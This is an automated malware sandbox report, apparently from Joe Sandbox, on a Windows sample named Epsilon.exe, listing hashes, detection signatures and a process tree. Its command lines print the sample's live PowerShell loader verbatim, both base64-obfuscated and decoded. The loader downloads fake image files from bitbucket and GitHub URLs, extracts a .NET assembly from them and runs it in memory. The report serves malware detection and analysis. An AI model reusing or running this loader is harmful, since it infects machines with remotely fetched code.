Windows Analysis Report
Epsilon.exe

Overview

General Information

Sample name: Epsilon.exe
Analysis ID: 1582590
MD5: 61566aa90d2dcaf483fe4697031f46c4
SHA1: b072393ac533c868683a93aa98e350144a772c34
SHA256: 51826c6098770542d808375156b42c288ba675863a73eca9084c402a11771b2d
Tags: exe user-aachum

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and load assembly
Sigma detected: Powershell download payload from hardcoded c2 list
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
.NET source code references suspicious native API functions
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Binary contains a suspicious time stamp
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain checking for process token information
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • Epsilon.exe (PID: 7312 cmdline: "C:\Users\user\Desktop\Epsilon.exe" MD5: 61566AA90D2DCAF483FE4697031F46C4)
    • cmd.exe (PID: 7344 cmdline: cmd.exe /c 677174b841ee7.vbs MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wscript.exe (PID: 7416 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\677174b841ee7.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
        • powershell.exe (PID: 7504 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Go$a$Bn$GY$a$Bo$Gs$agBl$GU$Z$Bl$GY$Z$Bm$C8$bQBu$GI$dgBn$Go$Z$Bn$C8$Z$Bv$Hc$bgBs$G8$YQBk$HM$LwB0$GU$cwB0$C4$agBw$Gc$Pw$1$DM$Nw$2$DE$MQ$n$Cw$I$$n$Gg$d$B0$H$$cw$6$C8$LwBy$GE$dw$u$Gc$aQB0$Gg$dQBi$HU$cwBl$HI$YwBv$G4$d$Bl$G4$d$$u$GM$bwBt$C8$ZwBt$GU$Z$B1$HM$YQ$x$DM$NQ$v$G4$YQBu$G8$LwBy$GU$ZgBz$C8$a$Bl$GE$Z$Bz$C8$bQBh$Gk$bg$v$G4$ZQB3$F8$aQBt$Gc$MQ$y$DM$LgBq$H$$Zw$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$I$$9$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$$k$Gw$aQBu$Gs$cw$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$Gk$Zg$g$Cg$J$B
p$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$LQBu$GU$I$$k$G4$dQBs$Gw$KQ$g$Hs$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C$$PQ$g$Fs$UwB5$HM$d$Bl$G0$LgBU$GU$e$B0$C4$RQBu$GM$bwBk$Gk$bgBn$F0$Og$6$FU$V$BG$Dg$LgBH$GU$d$BT$HQ$cgBp$G4$Zw$o$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$g$D0$I$$n$Dw$P$BC$EE$UwBF$DY$N$Bf$FM$V$BB$FI$V$$+$D4$Jw$7$C$$J$Bl$G4$Z$BG$Gw$YQBn$C$$PQ$g$Cc$P$$8$EI$QQBT$EU$Ng$0$F8$RQBO$EQ$Pg$+$Cc$Ow$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$SQBu$GQ$ZQB4$E8$Zg$o$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$KQ$7$C$$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$ZQBu$GQ$SQBu$GQ$ZQB4$C$$PQ$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$LgBJ$G4$Z$Bl$Hg$TwBm$Cg$J$Bl$G4$Z$BG$Gw$YQBn$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$Bp$GY$I$$o$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$C0$ZwBl$C$$M$$g$C0$YQBu$GQ$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$ZwB0$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$Ck$I$B7$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$C$$Kw$9$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bi$GE$cwBl$DY$N$BM$GU$bgBn$HQ$a$$g$D0$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$I$$k$HM$d$Bh$HI$d$BJ$G4$Z$Bl$Hg$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$GI$YQBz$GU$Ng$0$EM$bwBt$G0$YQBu$GQ$I$$9$C$$J$Bp$G0$YQBn$GU$V$Bl$Hg$d$$u$FM$dQBi$HM$d$By$Gk$bgBn$Cg$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$Cw$I$$k$GI$YQBz$GU$Ng$0$Ew$ZQBu$Gc$d$Bo$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$BF$G4$YwBv$GQ$ZQBk$FQ$ZQB4$HQ$I$$9$Fs$QwBv$G4$dgBl$HI$d$Bd$Do$OgBU$G8$QgBh$HM$ZQ$2$DQ$UwB0$HI$aQBu$Gc$K$$k$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bj$G8$bQBt$GE$bgBk$EI$eQB0$GU$cw$g$D0$I$Bb$FM$eQBz$HQ$ZQBt$C4$QwBv$G4$dgBl$HI$d$Bd$Do$OgBG$HI$bwBt$EI$YQBz$GU$Ng$0$FM$d$By$Gk$bgBn$Cg$J$Bi$GE$cwBl$DY$N$BD$G8$bQBt$GE$bgBk$Ck$Ow$g$C$$I$$k$HQ$ZQB4$HQ$I$$9$C$$J$BF$G4$YwBv$GQ$ZQBk$FQ$ZQB4$HQ$Ow$g$CQ$b$Bv$GE$Z$Bl$GQ$QQBz$HM$ZQBt$GI$b$B5$C$$PQ$g$Fs$UwB5$HM$d$Bl$G0$LgBS$GU$ZgBs$GU$YwB0$Gk$bwBu$C4$QQBz$HM$ZQBt$GI$b$B5$F0$Og$6$Ew$bwBh$GQ$K$$k$GM$bwBt$G0$YQBu$GQ$QgB5$HQ$ZQBz$Ck$Ow$g$C$$J$BF$G4$YwB
v$GQ$ZQBk$FQ$ZQB4$HQ$I$$9$Fs$QwBv$G4$dgBl$HI$d$Bd$Do$OgBU$G8$QgBh$HM$ZQ$2$DQ$UwB0$HI$aQBu$Gc$K$$k$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$YwBv$G0$c$By$GU$cwBz$GU$Z$BC$Hk$d$Bl$EE$cgBy$GE$eQ$g$D0$I$BH$GU$d$$t$EM$bwBt$H$$cgBl$HM$cwBl$GQ$QgB5$HQ$ZQBB$HI$cgBh$Hk$I$$t$GI$eQB0$GU$QQBy$HI$YQB5$C$$J$Bl$G4$YwBU$GU$e$B0$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$HQ$eQBw$GU$I$$9$C$$J$Bs$G8$YQBk$GU$Z$BB$HM$cwBl$G0$YgBs$Hk$LgBH$GU$d$BU$Hk$c$Bl$Cg$JwB0$GU$cwB0$H$$bwB3$GU$cgBz$Gg$ZQBs$Gw$LgBI$G8$YQBh$GE$YQBh$GE$cwBk$G0$ZQ$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$EU$bgBj$G8$Z$Bl$GQ$V$Bl$Hg$d$$g$D0$WwBD$G8$bgB2$GU$cgB0$F0$Og$6$FQ$bwBC$GE$cwBl$DY$N$BT$HQ$cgBp$G4$Zw$o$CQ$QgB5$HQ$ZQBz$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$G0$ZQB0$Gg$bwBk$C$$PQ$g$CQ$d$B5$H$$ZQ$u$Ec$ZQB0$E0$ZQB0$Gg$bwBk$Cg$JwBs$GY$cwBn$GU$Z$Bk$GQ$Z$Bk$GQ$Z$Bh$Cc$KQ$u$Ek$bgB2$G8$awBl$Cg$J$Bu$HU$b$Bs$Cw$I$Bb$G8$YgBq$GU$YwB0$Fs$XQBd$C$$K$$n$C$$d$B4$HQ$LgBo$GM$awBT$Gs$c$Bv$C8$cwBk$GE$bwBs$G4$dwBv$GQ$LwBy$Hc$cQBl$Hc$cQBm$HE$dwBm$C8$cQBy$GU$d$By$GU$d$By$C8$ZwBy$G8$LgB0$GU$awBj$HU$YgB0$Gk$Yg$n$Cw$I$$n$D$$Jw$s$C$$JwBT$HQ$YQBy$HQ$dQBw$E4$YQBt$GU$Jw$s$C$$JwBN$HM$YgB1$Gk$b$Bk$Cc$L$$g$Cc$M$$n$Ck$KQB9$H0$';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('$','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 7512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7660 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jhgfhhkjeedefdf/mnbvgjdg/downloads/test.jpg?537611', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.hckSkpo/sdaolnwod/rwqewqfqwf/qretretr/gro.tekcubtib', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup
No configs have been found
Source: Process Memory Space: powershell.exe PID: 7504, Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Author: Joe Security
Source: Process Memory Space: powershell.exe PID: 7504, Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC, Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution, Author: ditekSHen, Strings:
    • 0x6d376:$b2: ::FromBase64String(
    • 0xef2ac:$b2: ::FromBase64String(
    • 0x6d149:$b3: ::UTF8.GetString(
    • 0xef07f:$b3: ::UTF8.GetString(
    • 0xd54ff:$s1: -join
    • 0x12ecb3:$s1: -join
    • 0x2e829:$s3: reverse
    • 0x3547e:$s3: reverse
    • 0x37465:$s3: reverse
    • 0x42494:$s3: reverse
    • 0x89eba:$s3: reverse
    • 0x93d81:$s3: reverse
    • 0xbc5ae:$s3: reverse
    • 0xbc89c:$s3: reverse
    • 0xbcfb6:$s3: reverse
    • 0xbd76f:$s3: reverse
    • 0xc485a:$s3: reverse
    • 0xc4c74:$s3: reverse
    • 0xc57fc:$s3: reverse
    • 0xc64a9:$s3: reverse
    • 0x10aa67:$s3: reverse
Source: Process Memory Space: powershell.exe PID: 7660, Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Author: Joe Security
Source: Process Memory Space: powershell.exe PID: 7660, Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC, Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution, Author: ditekSHen, Strings:
      • 0xcb83:$b2: ::FromBase64String(
      • 0xe0f0:$b2: ::FromBase64String(
      • 0x2204a:$b2: ::FromBase64String(
      • 0x23f98:$b2: ::FromBase64String(
      • 0x29273:$b2: ::FromBase64String(
      • 0x3edcc:$b2: ::FromBase64String(
      • 0xc956:$b3: ::UTF8.GetString(
      • 0xdec3:$b3: ::UTF8.GetString(
      • 0x21e1d:$b3: ::UTF8.GetString(
      • 0x23d6b:$b3: ::UTF8.GetString(
      • 0x29046:$b3: ::UTF8.GetString(
      • 0x3eb9f:$b3: ::UTF8.GetString(
      • 0x35763:$s1: -join
      • 0x37979:$s1: -join
      • 0x57ffc:$s1: -join
      • 0x1465:$s3: Reverse
      • 0x2343:$s3: Reverse
      • 0xca78:$s4: +=
      • 0xdfe5:$s4: +=
      • 0x21f3f:$s4: +=
      • 0x23e8d:$s4: +=
Source: amsi64_7660.amsi.csv, Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Author: Joe Security

        Spreading

        Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jhgfhhkjeedefdf/mnbvgjdg/downloads/test.jpg?537611', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.hckSkpo/sdaolnwod/rwqewqfqwf/qretretr/gro.tekcubtib', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param 
([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jhgfhhkjeedefdf/mnbvgjdg/downloads/test.jpg?537611', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $start

        System Summary

        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Go$a$Bn$GY$a$Bo$Gs$agBl$GU$Z$Bl$GY$Z$Bm$C8$bQBu$GI$dgBn$Go$Z$Bn$C8$Z$Bv$Hc$bgBs$G8$YQBk$HM$LwB0$GU$cwB0$C4$agBw$Gc$Pw$1$DM$Nw$2$DE$MQ$n$Cw$I$$n$Gg$d$B0$H$$cw$6$C8$LwBy$GE$dw$u$Gc$aQB0$Gg$dQBi$HU$cwBl$HI$YwBv$G4$d$Bl$G4$d$$u$GM$bwBt$C8$ZwBt$GU$Z$B1$HM$YQ$x$DM$NQ$v$G4$YQBu$G8$LwBy$GU$ZgBz$C8$a$Bl$GE$Z$Bz$C8$bQBh$Gk$bg$v$G4$ZQB3$F8$aQBt$Gc$MQ$y$DM$LgBq$H$$Zw$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$I$$9$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$$k$Gw$aQBu$Gs$cw$7$$0$Cg$g$C$$I$
$g$C$$I$$g$C$$I$$g$C$$I$$g$Gk$Zg$g$Cg$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$LQBu$GU$I$$k$G4$dQBs$Gw$KQ$g$Hs$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C$$PQ$g$Fs$UwB5$HM$d$Bl$G0$LgBU$GU$e$B0$C4$RQBu$GM$bwBk$Gk$bgBn$F0$Og$6$FU$V$BG$Dg$LgBH$GU$d$BT$HQ$cgBp$G4$Zw$o$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$g$D0$I$$n$Dw$P$BC$EE$UwBF$DY$N$Bf$FM$V$BB$FI$V$$+$D4$Jw$7$C$$J$Bl$G4$Z$BG$Gw$YQBn$C$$PQ$g$Cc$P$$8$EI$QQBT$EU$Ng$0$F8$RQBO$EQ$Pg$+$Cc$Ow$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$SQBu$GQ$ZQB4$E8$Zg$o$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$KQ$7$C$$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$ZQBu$GQ$SQBu$GQ$ZQB4$C$$PQ$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$LgBJ$G4$Z$Bl$Hg$TwBm$Cg$J$Bl$G4$Z$BG$Gw$YQBn$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$Bp$GY$I$$o$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$C0$ZwBl$C$$M$$g$C0$YQBu$GQ$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$ZwB0$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$Ck$I$B7$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$C$$Kw$9$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J
        Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jhgfhhkjeedefdf/mnbvgjdg/downloads/test.jpg?537611', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.hckSkpo/sdaolnwod/rwqewqfqwf/qretretr/gro.tekcubtib', '0', 'StartupName', 'Msbuild', '0'))}}" .exe 